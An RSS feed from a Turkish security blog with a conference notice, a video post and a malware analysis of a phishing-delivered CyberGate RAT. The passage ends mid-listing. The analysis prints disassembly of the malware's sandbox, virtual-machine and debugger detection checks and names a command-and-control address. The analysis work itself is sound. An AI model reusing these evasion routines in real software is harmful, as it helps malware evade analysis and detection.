<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hack 4 Career</title>
	<atom:link href="http://www.mertsarica.com/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.mertsarica.com</link>
	<description>Information Technology Security</description>
	<lastBuildDate>Fri, 11 May 2012 07:51:46 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
		<item>
		<title>NOPcon Bilgi Güvenliği Konferansı</title>
		<link>http://www.mertsarica.com/?p=3038</link>
		<comments>http://www.mertsarica.com/?p=3038#comments</comments>
		<pubDate>Fri, 11 May 2012 07:51:46 +0000</pubDate>
		<dc:creator>M.S</dc:creator>
				<category><![CDATA[Duyurular]]></category>

		<guid isPermaLink="false">http://www.mertsarica.com/?p=3038</guid>
		<description><![CDATA[21 Mayıs 2012 Pazartesi günü NOPcon Bilgi Güvenliği Konferansı&#8216;nda, Android Uygulamalarında Güvenlik Testi konulu bir sunum gerçekleştireceğim, meraklılarına duyurulur :) 21 Mayıs 2012 Tarihinde Istanbul Bilgi Universitesi &#8211; Dolapdere kampüsünde, yerli ve yabancı alanında uzman araştırmacaların da sunumlarına yer verileceği NOPcon Bilgi Güvenliği Konferansı düzenlenecektir. #Kimler katılmalı? NOPcon, bilgi güvenliği/IT denetimi/network/sistem/yazılım departmanlarında ve sektöründe çalışanlara [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>21 Mayıs 2012 Pazartesi günü <a href="http://www.nopcon.org/" target="_blank">NOPcon Bilgi Güvenliği Konferansı</a>&#8216;nda, Android Uygulamalarında Güvenlik Testi konulu bir sunum gerçekleştireceğim, meraklılarına duyurulur :)</p></blockquote>
<p>21 Mayıs 2012 Tarihinde Istanbul Bilgi Universitesi &#8211; Dolapdere kampüsünde, yerli ve yabancı alanında uzman araştırmacaların da sunumlarına yer verileceği <a href="http://www.nopcon.org/" target="_blank">NOPcon Bilgi Güvenliği Konferansı</a> düzenlenecektir. </p>
<p>#Kimler katılmalı?<br />
NOPcon, bilgi güvenliği/IT denetimi/network/sistem/yazılım departmanlarında ve sektöründe çalışanlara , tersine mühendislik(reverse engineering) , exploiting , vulnerability research, forensic vb hack/güvenlik konularına ilgi, merak duyan herkese hitap etmektedir.</p>
<p>**Katılım ücretsizdir ; <a href="http://www.nopcon.org/register/" target="_blank">http://www.nopcon.org/register/</a> adresinden kayıt olabilirsiniz.</p>
<p>#NOPcon Ana Konuları</p>
<p>Sınırlı kalmamakla birlikte genel olarak NOPcon sunumları aşağıdaki konuları kapsayacaktır :</p>
<p>Offensive Technologies (Saldırgan Güvenlik Teknolojileri):<br />
- Exploit Geliştirme ve Bypass Mekanizmaları<br />
- Malware<br />
- Rootkit<br />
- Cryptovirology</p>
<p>Defensive Technologies (Savunma Teknolojileri)<br />
- Uygulama tabanlı güvenlik konuları<br />
- Network tabanlı güvenlik konuları<br />
- Kernel tabanlı güvenlik konuları</p>
<p>Embedded Device Hacking and Security (Gömülü Sistemler)<br />
- Mobil güvenlik ve saldırı teknikleri (iphone, android, windows phone)<br />
- Tablet, E-Reader güvenlik ve saldırı teknikleri</p>
<p>Vulnerability Research/Bug Hunting (Uygulama Güvenliği)<br />
- Kaynak Kod Analizi<br />
- Tersine Mühendislik<br />
- Web uygulama güvenliği<br />
- Fuzzing</p>
<p>Kritik Altyapı Sistemleri<br />
- SCADA Hacking &#038; Security<br />
- Telekominikasyon Güvenliği<br />
- Acil Durum Servisleri</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mertsarica.com/?feed=rss2&#038;p=3038</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Güvenlik TV Bölüm 9 – Ethical Hacking</title>
		<link>http://www.mertsarica.com/?p=3000</link>
		<comments>http://www.mertsarica.com/?p=3000#comments</comments>
		<pubDate>Wed, 25 Apr 2012 15:05:30 +0000</pubDate>
		<dc:creator>M.S</dc:creator>
				<category><![CDATA[Duyurular]]></category>

		<guid isPermaLink="false">http://www.mertsarica.com/?p=3000</guid>
		<description><![CDATA[Geçtiğimiz hafta Güvenlik TV’de Halil ÖZTÜRKCİ ve Sertan KOLAT ile Ethical Hacking konusunu ele aldık. Hacker’ın etiği olur mu? Etik Hacker nasıl olunur? Sertifikalı Hacker kimlere denir? Sertifikalı Hacker olmak için neleri bilmek gerekir? Penetrasyon testleri yapan firmaların akreditasyonu olmalı mı? Hangi eğitim alınmalı? Network Pentest ve Web Application Pentest aynı kişi tarafından yapılabilir mi? [...]]]></description>
			<content:encoded><![CDATA[<p>Geçtiğimiz hafta <a href="http://guvenliktv.org/" target="_blank">Güvenlik TV</a>’de <a href="http://www.halilozturkci.com/" target="_blank">Halil ÖZTÜRKCİ</a> ve <a href="http://www.sertankolat.com/" target="_blank">Sertan KOLAT</a> ile Ethical Hacking konusunu ele aldık. Hacker’ın etiği olur mu? Etik Hacker nasıl olunur? Sertifikalı Hacker kimlere denir? Sertifikalı Hacker olmak için neleri bilmek gerekir? Penetrasyon testleri yapan firmaların akreditasyonu olmalı mı? Hangi eğitim alınmalı? Network Pentest ve Web Application Pentest aynı kişi tarafından yapılabilir mi? Bütün bu soruları ve daha bir çok konu başlığını ele aldığımız bu keyifli sohbeti umarım sizler de keyifle izlersiniz, herkese keyifli seyirler dilerim.</p>
<p>(Videoyu tam ekran izleyebilmek için iki defa üzerine basmanız yeterlidir)<br />
<a href="http://www.mertsarica.com/?p=3000#mediaPlayer_3000_0">Videoyu oynat</a><br />
(Linux kullanıcısı iseniz videoyu izlemek için <a href="http://www.mertsarica.com/videos/guvenliktv.wmv" target="_blank">buraya</a> tıklayın)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mertsarica.com/?feed=rss2&#038;p=3000</wfw:commentRss>
		<slash:comments>2</slash:comments>
<enclosure url="http://www.mertsarica.com/videos/guvenliktv.wmv" length="249249377" type="video/asf" />
		</item>
		<item>
		<title>Anti Analiz</title>
		<link>http://www.mertsarica.com/?p=2954</link>
		<comments>http://www.mertsarica.com/?p=2954#comments</comments>
		<pubDate>Mon, 23 Apr 2012 09:03:15 +0000</pubDate>
		<dc:creator>M.S</dc:creator>
				<category><![CDATA[Güvenlik]]></category>

		<guid isPermaLink="false">http://www.mertsarica.com/?p=2954</guid>
		<description><![CDATA[Yakın bir arkadaşım ile 12 Nisan tarihinde Namık Kemal Üniversitesi&#8217;ne bağlı Çorlu Mühendislik Fakültesi&#8217;nde gerçekleşen İnternet Haftası etkinliğinden dönerken bana 1 saat önce kendisine ulaşan e-postayı gösterdi. E-postanın konu başlığı (&#8220;Bakalım bunu nasıl açıklayacaksın!!!!) ve içeriği (&#8220;Nokia Fotoğraflar.rar&#8221;) şüpheli olduğu için arkadaşıma e-postayı bana göndermesini ilettikten sonra mümkün olan en kısa zamanda analiz için işe [...]]]></description>
			<content:encoded><![CDATA[<p>Yakın bir arkadaşım ile 12 Nisan tarihinde Namık Kemal Üniversitesi&#8217;ne bağlı Çorlu Mühendislik Fakültesi&#8217;nde gerçekleşen İnternet Haftası etkinliğinden dönerken bana 1 saat önce kendisine ulaşan e-postayı gösterdi. E-postanın konu başlığı (&#8220;Bakalım bunu nasıl açıklayacaksın!!!!) ve içeriği (&#8220;Nokia Fotoğraflar.rar&#8221;) şüpheli olduğu için arkadaşıma e-postayı bana göndermesini ilettikten sonra mümkün olan en kısa zamanda analiz için işe koyuldum.<br />
<br \/><br />
<img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/antiem1.jpg" alt="Anti Codes" /></p>
<p>Gelen e-posta SPAM kategorisin girmediği için direk gelen kutusuna gelmişti. E-posta, HTML içeriğe sahip olduğu için eklenti adı ve eklentiye ait resim güzel bir şekilde konumlandırılmıştı ve bu nedenle dikkatsiz bir kullanıcı tarafından ilk bakışta eklentinin Gmail&#8217;de olduğu düşünülebilirdi. E-postanın başlık bilgilerine (headers) dikkatlice bakılınca HTML kodlar ve eklentinin bulunduğu kısaltılmış (bit.ly) web adresi dikkat çekiyordu.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/antiem2.jpg" alt="Anti Codes" /></p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/antiem3.jpg" alt="Anti Codes" /></p>
<p>Nokia_Fofoğraflar.rar dosyasını indirip açtıktan sonra içinden çıkan 2 yazılımın (DSC0025.exe ve DSC0027.exe) PE başlık bilgilerinde yer alan zaman damgaları 10.04.2012 12:47:51 tarihini gösteriyordu.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/antiem9.jpg" alt="Anti Codes" /></p>
<p>İki yazılımın ortak özelliklerinden biri çalıştırılır çalıştırılmaz ekrana aşağıdaki resmi çıkartıyor olmasıydı.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/antiem12.jpg" alt="Anti Codes" /></p>
<p>Bu iki yazılımın kullanmış olduğum antivirüs yazılımı tarafından tespit edilmemiş olması zararlı yazılım oluşturan kişiler arasında sıkça tercih edilen Crypter (şifreleme) aracı ile yazılımların oluşturulduğu şüphesini uyandırdı.<br />
Virustotal üzerinden 42 farklı Antivirüs yazılımı ile bu iki yazılımı tarattığımda sadece 2 tanesi bu zararlı yazılımları tanıyabiliyordu.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/antiem4.jpg" alt="Anti Codes" /></p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/antiem5.jpg" alt="Anti Codes" /></p>
<p>Boyutu diğerine kıyasla daha ufak olan DSC0027.exe yazılımını sanal makine içinde Immunity Debugger aracı ile dinamik olarak analiz ettiğimde yazılımın 2004 yılından kalma Flux RAT olduğunu (flServ.exe adı altında çalışmaktadır), kendinisini explorer.exe içine enjekte ettiğini ve Vodafone 3G IP bloğunda yer alan 46.155.243.4 dinamik ip adresi (*****.zapto.org) ile 2001 numaralı bağlantı noktası üzerinden haberleşmeye çalıştığı rahatlıkla anlaşılıyordu.</p>
<p>Ancak DSC0027.exe adındaki diğer zararlı yazılımı incelediğimde sanal makine içinde çalışmadığı gibi Anubis ve benzeri online kum havuzu (sandbox) hizmetleri tarafından da analiz edilemiyordu. Günümüzde çoğu zararlı yazılımı oluşturan ana yazılımların oluşturdukları zararlı yazılımın sanal makinelerde ve kum havuzu araçlarında çalıştırılmaya karşı ek kontroller barındırdığı düşünüldüğünde çalışmamasının başka bir nedeni olabileceğini pek düşünmemiştim.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/antiem10.jpg" alt="Anti Codes" /></p>
<p><a href="http://www.norman.com/products/debugger_pro/" target="_blank">Norman Malware Debugger PRO</a> aracı ile zararlı yazılımı incelediğimde az önce bahsetmiş olduğum kontrollerin yazılım üzerinde mevcut olduğuna dair bilgilendirme mesajları ile karşılaştım.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/antiem7.jpg" alt="Anti Codes" /></p>
<p>Zararlı yazılımı Immunity Debugger ile detaylı olarak incelediğimde bu yazılımın aslında CyberGate RAT (cyber_server.exe adı altında çalışmaktadır) olduğu ve Norman Malware Debugger PRO aracının belirtmiş olduğu gibi üzerinde birçok anti analiz kodlarını (vmware, virtualbox, anubis, debugger vb.) yer aldığı açıkça görülüyordu.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/antiem8.jpg" alt="Anti Codes" /></p>
<p><code><br />
<strong>Sandboxie Kontrolu</strong><br />
00407888 /$ 53 PUSH EBX<br />
00407889 |. 33DB XOR EBX,EBX<br />
0040788B |. 68 A0784000 PUSH cyber_se.004078A0 ; /pModule = "SbieDll.dll"<br />
00407890 |. E8 1FDCFFFF CALL ; \GetModuleHandleA<br />
00407895 |. 85C0 TEST EAX,EAX<br />
00407897 |. 74 02 JE SHORT cyber_se.0040789B<br />
00407899 |. B3 01 MOV BL,1<br />
0040789B |&gt; 8BC3 MOV EAX,EBX<br />
0040789D |. 5B POP EBX<br />
0040789E \. C3 RETN</code></p>
<p><strong>ThreatExpert Kontrolu</strong><br />
004078AC /$ 53 PUSH EBX<br />
004078AD |. 33DB XOR EBX,EBX<br />
004078AF |. 68 C4784000 PUSH cyber_se.004078C4 ; /pModule = &#8220;dbghelp.dll&#8221;<br />
004078B4 |. E8 FBDBFFFF CALL ; \GetModuleHandleA<br />
004078B9 |. 85C0 TEST EAX,EAX<br />
004078BB |. 74 02 JE SHORT cyber_se.004078BF<br />
004078BD |. B3 01 MOV BL,1<br />
004078BF |&gt; 8BC3 MOV EAX,EBX<br />
004078C1 |. 5B POP EBX<br />
004078C2 \. C3 RETN</p>
<p><strong>Sandbox Kontrolu</strong><br />
55274-640-2673064-23950 &#8211; JoeBox<br />
004078D0 /$ 53 PUSH EBX<br />
004078D1 |. 81C4 F4FEFFFF ADD ESP,-10C<br />
004078D7 |. 33DB XOR EBX,EBX<br />
004078D9 |. 54 PUSH ESP ; /pHandle<br />
004078DA |. 6A 01 PUSH 1 ; |Access<br />
004078DC |. 6A 00 PUSH 0 ; |Reserved = 0<br />
004078DE |. 68 38794000 PUSH cyber_se.00407938 ; |Subkey = &#8220;Software\Microsoft\Windows\CurrentVersion&#8221;<br />
004078E3 |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE<br />
004078E8 |. E8 EFDAFFFF CALL ; \RegOpenKeyExA<br />
004078ED |. 85C0 TEST EAX,EAX<br />
004078EF |. 75 32 JNZ SHORT cyber_se.00407923<br />
004078F1 |. C74424 04 0101&gt;MOV DWORD PTR SS:[ESP+4],101<br />
004078F9 |. 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]<br />
004078FD |. 50 PUSH EAX ; /pBufSize<br />
004078FE |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C] ; |<br />
00407902 |. 50 PUSH EAX ; |Buffer<br />
00407903 |. 6A 00 PUSH 0 ; |pValueType = NULL<br />
00407905 |. 6A 00 PUSH 0 ; |Reserved = NULL<br />
00407907 |. 68 64794000 PUSH cyber_se.00407964 ; |ValueName = &#8220;ProductId&#8221;<br />
0040790C |. 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14] ; |<br />
00407910 |. 50 PUSH EAX ; |hKey<br />
00407911 |. E8 CEDAFFFF CALL ; \RegQueryValueExA<br />
00407916 |. 8D4424 08 LEA EAX,DWORD PTR SS:[ESP+8]<br />
0040791A |. 3D 70794000 CMP EAX,cyber_se.00407970 ; ASCII &#8220;55274-640-2673064-23950&#8243;<br />
0040791F |. 75 02 JNZ SHORT cyber_se.00407923<br />
00407921 |. B3 01 MOV BL,1<br />
00407923 |&gt; 8B0424 MOV EAX,DWORD PTR SS:[ESP]<br />
00407926 |. 50 PUSH EAX ; /hKey<br />
00407927 |. E8 88DAFFFF CALL ; \RegCloseKey<br />
0040792C |. 8BC3 MOV EAX,EBX<br />
0040792E |. 81C4 0C010000 ADD ESP,10C<br />
00407934 |. 5B POP EBX<br />
00407935 \. C3 RETN</p>
<p><strong>76487-644-3177037-23510 &#8211; CWSandbox</strong><br />
00407988 /$ 53 PUSH EBX<br />
00407989 |. 81C4 F4FEFFFF ADD ESP,-10C<br />
0040798F |. 33DB XOR EBX,EBX<br />
00407991 |. 54 PUSH ESP ; /pHandle<br />
00407992 |. 6A 01 PUSH 1 ; |Access<br />
00407994 |. 6A 00 PUSH 0 ; |Reserved = 0<br />
00407996 |. 68 F0794000 PUSH cyber_se.004079F0 ; |Subkey = &#8220;Software\Microsoft\Windows\CurrentVersion&#8221;<br />
0040799B |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE<br />
004079A0 |. E8 37DAFFFF CALL ; \RegOpenKeyExA<br />
004079A5 |. 85C0 TEST EAX,EAX<br />
004079A7 |. 75 32 JNZ SHORT cyber_se.004079DB<br />
004079A9 |. C74424 04 0101&gt;MOV DWORD PTR SS:[ESP+4],101<br />
004079B1 |. 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]<br />
004079B5 |. 50 PUSH EAX ; /pBufSize<br />
004079B6 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C] ; |<br />
004079BA |. 50 PUSH EAX ; |Buffer<br />
004079BB |. 6A 00 PUSH 0 ; |pValueType = NULL<br />
004079BD |. 6A 00 PUSH 0 ; |Reserved = NULL<br />
004079BF |. 68 1C7A4000 PUSH cyber_se.00407A1C ; |ValueName = &#8220;ProductId&#8221;<br />
004079C4 |. 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14] ; |<br />
004079C8 |. 50 PUSH EAX ; |hKey<br />
004079C9 |. E8 16DAFFFF CALL ; \RegQueryValueExA<br />
004079CE |. 8D4424 08 LEA EAX,DWORD PTR SS:[ESP+8]<br />
004079D2 |. 3D 287A4000 CMP EAX,cyber_se.00407A28 ; ASCII &#8220;76487-644-3177037-23510&#8243;<br />
004079D7 |. 75 02 JNZ SHORT cyber_se.004079DB<br />
004079D9 |. B3 01 MOV BL,1<br />
004079DB |&gt; 8B0424 MOV EAX,DWORD PTR SS:[ESP]<br />
004079DE |. 50 PUSH EAX ; /hKey<br />
004079DF |. E8 D0D9FFFF CALL ; \RegCloseKey<br />
004079E4 |. 8BC3 MOV EAX,EBX<br />
004079E6 |. 81C4 0C010000 ADD ESP,10C<br />
004079EC |. 5B POP EBX<br />
004079ED \. C3 RETN</p>
<p><strong>76487-337-8429955-22614 &#8211; Anubis</strong><br />
00407A40 /$ 53 PUSH EBX<br />
00407A41 |. 81C4 F4FEFFFF ADD ESP,-10C<br />
00407A47 |. 33DB XOR EBX,EBX<br />
00407A49 |. 54 PUSH ESP ; /pHandle<br />
00407A4A |. 6A 01 PUSH 1 ; |Access<br />
00407A4C |. 6A 00 PUSH 0 ; |Reserved = 0<br />
00407A4E |. 68 A87A4000 PUSH cyber_se.00407AA8 ; |Subkey = &#8220;Software\Microsoft\Windows\CurrentVersion&#8221;<br />
00407A53 |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE<br />
00407A58 |. E8 7FD9FFFF CALL ; \RegOpenKeyExA<br />
00407A5D |. 85C0 TEST EAX,EAX<br />
00407A5F |. 75 32 JNZ SHORT cyber_se.00407A93<br />
00407A61 |. C74424 04 0101&gt;MOV DWORD PTR SS:[ESP+4],101<br />
00407A69 |. 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]<br />
00407A6D |. 50 PUSH EAX ; /pBufSize<br />
00407A6E |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C] ; |<br />
00407A72 |. 50 PUSH EAX ; |Buffer<br />
00407A73 |. 6A 00 PUSH 0 ; |pValueType = NULL<br />
00407A75 |. 6A 00 PUSH 0 ; |Reserved = NULL<br />
00407A77 |. 68 D47A4000 PUSH cyber_se.00407AD4 ; |ValueName = &#8220;ProductId&#8221;<br />
00407A7C |. 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14] ; |<br />
00407A80 |. 50 PUSH EAX ; |hKey<br />
00407A81 |. E8 5ED9FFFF CALL ; \RegQueryValueExA<br />
00407A86 |. 8D4424 08 LEA EAX,DWORD PTR SS:[ESP+8]<br />
00407A8A |. 3D E07A4000 CMP EAX,cyber_se.00407AE0 ; ASCII &#8220;76487-337-8429955-22614&#8243;<br />
00407A8F |. 75 02 JNZ SHORT cyber_se.00407A93<br />
00407A91 |. B3 01 MOV BL,1<br />
00407A93 |&gt; 8B0424 MOV EAX,DWORD PTR SS:[ESP]<br />
00407A96 |. 50 PUSH EAX ; /hKey<br />
00407A97 |. E8 18D9FFFF CALL ; \RegCloseKey<br />
00407A9C |. 8BC3 MOV EAX,EBX<br />
00407A9E |. 81C4 0C010000 ADD ESP,10C<br />
00407AA4 |. 5B POP EBX<br />
00407AA5 \. C3 RETN</p>
<p><strong>IsDebuggerPresent</strong><br />
00407BC8 /$ 53 PUSH EBX<br />
00407BC9 |. 56 PUSH ESI<br />
00407BCA |. 57 PUSH EDI<br />
00407BCB |. 55 PUSH EBP<br />
00407BCC |. 33DB XOR EBX,EBX<br />
00407BCE |. 68 FC7B4000 PUSH cyber_se.00407BFC ; /FileName = &#8220;kernel32.dll&#8221;<br />
00407BD3 |. E8 14D9FFFF CALL ; \LoadLibraryA<br />
00407BD8 |. 8BF8 MOV EDI,EAX<br />
00407BDA |. 85FF TEST EDI,EDI<br />
00407BDC |. 74 17 JE SHORT cyber_se.00407BF5<br />
00407BDE |. 68 0C7C4000 PUSH cyber_se.00407C0C ; /ProcNameOrOrdinal<br />
00407BE3 |. 57 PUSH EDI ; |hModule<br />
00407BE4 |. E8 E3D8FFFF CALL ; \GetProcAddress<br />
00407BE9 |. 8BE8 MOV EBP,EAX ; kernel32.IsDebuggerPresent<br />
00407BEB |. 89EE MOV ESI,EBP<br />
00407BED |. 85ED TEST EBP,EBP<br />
00407BEF |. 74 04 JE SHORT cyber_se.00407BF5<br />
00407BF1 |. FFD6 CALL ESI<br />
00407BF3 |. 8BD8 MOV EBX,EAX<br />
00407BF5 |&gt; 8BC3 MOV EAX,EBX<br />
00407BF7 |. 5D POP EBP<br />
00407BF8 |. 5F POP EDI<br />
00407BF9 |. 5E POP ESI<br />
00407BFA |. 5B POP EBX<br />
00407BFB \. C3 RETN</p>
<p><strong>Virtual PC</strong><br />
00407726 0F DB 0F ; Virtual PC Kontrolü<br />
00407727 3F DB 3F ; CHAR &#8216;?&#8217;<br />
00407728 07 DB 07</p>
<p><strong>VMWare</strong><br />
004076CD . B8 68584D56 MOV EAX,564D5868<br />
004076D2 . BB 12F76C3C MOV EBX,3C6CF712<br />
004076D7 . B9 0A000000 MOV ECX,0A<br />
004076DC . 66:BA 5856 MOV DX,5658</p>
<p><strong>VirtualBox</strong><br />
00407768 /$ 55 PUSH EBP<br />
00407769 |. 8BEC MOV EBP,ESP<br />
0040776B |. 81C4 C8FEFFFF ADD ESP,-138<br />
00407771 |. 53 PUSH EBX<br />
00407772 |. 56 PUSH ESI<br />
00407773 |. 33C0 XOR EAX,EAX<br />
00407775 |. 8985 D4FEFFFF MOV DWORD PTR SS:[EBP-12C],EAX<br />
0040777B |. 8985 CCFEFFFF MOV DWORD PTR SS:[EBP-134],EAX<br />
00407781 |. 8985 C8FEFFFF MOV DWORD PTR SS:[EBP-138],EAX<br />
00407787 |. 8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX<br />
0040778D |. 33C0 XOR EAX,EAX<br />
0040778F |. 55 PUSH EBP<br />
00407790 |. 68 60784000 PUSH cyber_se.00407860<br />
00407795 |. 64:FF30 PUSH DWORD PTR FS:[EAX]<br />
00407798 |. 64:8920 MOV DWORD PTR FS:[EAX],ESP<br />
0040779B |. 33DB XOR EBX,EBX<br />
0040779D |. 33D2 XOR EDX,EDX<br />
0040779F |. B8 02000000 MOV EAX,2<br />
004077A4 |. E8 7FFEFFFF CALL cyber_se.00407628<br />
004077A9 |. 8BF0 MOV ESI,EAX<br />
004077AB |. C785 D8FEFFFF &gt;MOV DWORD PTR SS:[EBP-128],128<br />
004077B5 |. EB 70 JMP SHORT cyber_se.00407827<br />
004077B7 |&gt; 8D85 D0FEFFFF /LEA EAX,DWORD PTR SS:[EBP-130]<br />
004077BD |. 8D95 FCFEFFFF |LEA EDX,DWORD PTR SS:[EBP-104]<br />
004077C3 |. B9 04010000 |MOV ECX,104<br />
004077C8 |. E8 1BC2FFFF |CALL cyber_se.004039E8<br />
004077CD |. 8B85 D0FEFFFF |MOV EAX,DWORD PTR SS:[EBP-130]<br />
004077D3 |. 8D95 D4FEFFFF |LEA EDX,DWORD PTR SS:[EBP-12C]<br />
004077D9 |. E8 12F5FFFF |CALL cyber_se.00406CF0<br />
004077DE |. 8B85 D4FEFFFF |MOV EAX,DWORD PTR SS:[EBP-12C]<br />
004077E4 |. 50 |PUSH EAX<br />
004077E5 |. 8D95 C8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-138]<br />
004077EB |. B8 78784000 |MOV EAX,cyber_se.00407878 ; ASCII &#8220;VBoxService.exe&#8221;<br />
004077F0 |. E8 FBF4FFFF |CALL cyber_se.00406CF0<br />
004077F5 |. 8B85 C8FEFFFF |MOV EAX,DWORD PTR SS:[EBP-138]<br />
004077FB |. E8 14C4FFFF |CALL cyber_se.00403C14<br />
00407800 |. 8BD0 |MOV EDX,EAX<br />
00407802 |. 8D85 CCFEFFFF |LEA EAX,DWORD PTR SS:[EBP-134]<br />
00407808 |. E8 63C1FFFF |CALL cyber_se.00403970<br />
0040780D |. 8B85 CCFEFFFF |MOV EAX,DWORD PTR SS:[EBP-134]<br />
00407813 |. 5A |POP EDX<br />
00407814 |. E8 E3C4FFFF |CALL cyber_se.00403CFC<br />
00407819 |. 85C0 |TEST EAX,EAX<br />
0040781B |. 7E 0A |JLE SHORT cyber_se.00407827<br />
0040781D |. 56 |PUSH ESI ; /hObject<br />
0040781E |. E8 D1DBFFFF |CALL ; \CloseHandle<br />
00407823 |. B3 01 |MOV BL,1<br />
00407825 |. EB 1B |JMP SHORT cyber_se.00407842<br />
00407827 |&gt; 8D95 D8FEFFFF LEA EDX,DWORD PTR SS:[EBP-128]<br />
0040782D |. 8BC6 |MOV EAX,ESI<br />
0040782F |. E8 34FEFFFF |CALL cyber_se.00407668<br />
00407834 |. 85C0 |TEST EAX,EAX<br />
00407836 |.^0F85 7BFFFFFF \JNZ cyber_se.004077B7<br />
0040783C |. 56 PUSH ESI ; /hObject<br />
0040783D |. E8 B2DBFFFF CALL ; \CloseHandle<br />
00407842 |&gt; 33C0 XOR EAX,EAX<br />
00407844 |. 5A POP EDX<br />
00407845 |. 59 POP ECX<br />
00407846 |. 59 POP ECX<br />
00407847 |. 64:8910 MOV DWORD PTR FS:[EAX],EDX<br />
0040784A |. 68 67784000 PUSH cyber_se.00407867<br />
0040784F |&gt; 8D85 C8FEFFFF LEA EAX,DWORD PTR SS:[EBP-138]<br />
00407855 |. BA 04000000 MOV EDX,4<br />
0040785A |. E8 3DBFFFFF CALL cyber_se.0040379C<br />
0040785F \. C3 RETN</p>
<p><strong>Softice Kontrolu</strong><br />
00407DB0 /$ 53 PUSH EBX<br />
00407DB1 |. 33DB XOR EBX,EBX<br />
00407DB3 |. 6A 00 PUSH 0 ; /hTemplateFile = NULL<br />
00407DB5 |. 68 80000000 PUSH 80 ; |Attributes = NORMAL<br />
00407DBA |. 6A 03 PUSH 3 ; |Mode = OPEN_EXISTING<br />
00407DBC |. 6A 00 PUSH 0 ; |pSecurity = NULL<br />
00407DBE |. 6A 03 PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE<br />
00407DC0 |. 68 000000C0 PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE<br />
00407DC5 |. 68 E07D4000 PUSH cyber_se.00407DE0 ; |FileName = &#8220;\\.\SICE&#8221;<br />
00407DCA |. E8 45D6FFFF CALL ; \CreateFileA<br />
00407DCF |. 83F8 FF CMP EAX,-1<br />
00407DD2 |. 74 08 JE SHORT cyber_se.00407DDC<br />
00407DD4 |. 50 PUSH EAX ; /hObject<br />
00407DD5 |. E8 1AD6FFFF CALL ; \CloseHandle<br />
00407DDA |. B3 01 MOV BL,1<br />
00407DDC |&gt; 8BC3 MOV EAX,EBX<br />
00407DDE |. 5B POP EBX<br />
00407DDF \. C3 RETN<br />
00407DE0 . 5C 5C 2E 5C 53&gt;ASCII &#8220;\\.\SICE&#8221;,0<br />
00407DE9 00 DB 00<br />
00407DEA 00 DB 00<br />
00407DEB 00 DB 00<br />
00407DEC /$ 53 PUSH EBX<br />
00407DED |. 33DB XOR EBX,EBX<br />
00407DEF |. 6A 00 PUSH 0 ; /hTemplateFile = NULL<br />
00407DF1 |. 68 80000000 PUSH 80 ; |Attributes = NORMAL<br />
00407DF6 |. 6A 03 PUSH 3 ; |Mode = OPEN_EXISTING<br />
00407DF8 |. 6A 00 PUSH 0 ; |pSecurity = NULL<br />
00407DFA |. 6A 03 PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE<br />
00407DFC |. 68 000000C0 PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE<br />
00407E01 |. 68 1C7E4000 PUSH cyber_se.00407E1C ; |FileName = &#8220;\\.\NTICE&#8221;<br />
00407E06 |. E8 09D6FFFF CALL ; \CreateFileA<br />
00407E0B |. 83F8 FF CMP EAX,-1<br />
00407E0E |. 74 08 JE SHORT cyber_se.00407E18<br />
00407E10 |. 50 PUSH EAX ; /hObject<br />
00407E11 |. E8 DED5FFFF CALL ; \CloseHandle<br />
00407E16 |. B3 01 MOV BL,1<br />
00407E18 |&gt; 8BC3 MOV EAX,EBX<br />
00407E1A |. 5B POP EBX<br />
00407E1B \. C3 RETN<br />
00407E1C . 5C 5C 2E 5C 4E&gt;ASCII &#8220;\\.\NTICE&#8221;,0</p>
<p><strong>SyserDebugger Kontrolu</strong><br />
00407D53 . B8 847D4000 MOV EAX,cyber_se.00407D84 ; ASCII &#8220;\\.\Syser&#8221;<br />
00407D58 . E8 C7FFFFFF CALL cyber_se.00407D24<br />
00407D5D . 84C0 TEST AL,AL<br />
00407D5F . 75 1C JNZ SHORT cyber_se.00407D7D<br />
